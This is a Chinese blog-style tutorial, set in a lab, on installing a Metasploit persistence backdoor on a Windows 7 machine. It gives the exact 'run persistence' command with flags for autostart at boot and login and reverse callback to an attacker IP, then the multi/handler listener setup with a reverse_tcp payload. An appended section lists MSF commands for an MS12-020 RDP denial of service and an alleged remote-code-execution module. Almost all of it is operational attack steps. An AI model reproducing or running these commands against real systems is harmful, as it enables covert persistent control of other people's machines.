MSF之Persistence后门

Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件

一、实验环境

攻击主机:2021 Kali        (ip:192.168.110.130)

靶机:win7(专业版)     (ip:192.168.110.134)

准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞)

二、实验步骤

1.获得 meterpreter shell 之后,输入 run persistence -A -S -U -i 5 -p 4444 -r 192.168.110.130

命令语法:

A:自动启动Payload程序

S:系统登录时自动加载

U:用户登录时自动启动

X:开机时自动加载

i:回连的时间间隔

P:监听反向连接端口号

r:目标机器 IP 地址(攻击主机)

 2.执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启

3.kali输入 use exploit/multi/handler(监听模块,非常重要)

 > set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.110.130

> set LPORT 4444(端口要和上面的persistence后门端口一致)

4.运行成功,获得meterpreter shell

 

  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值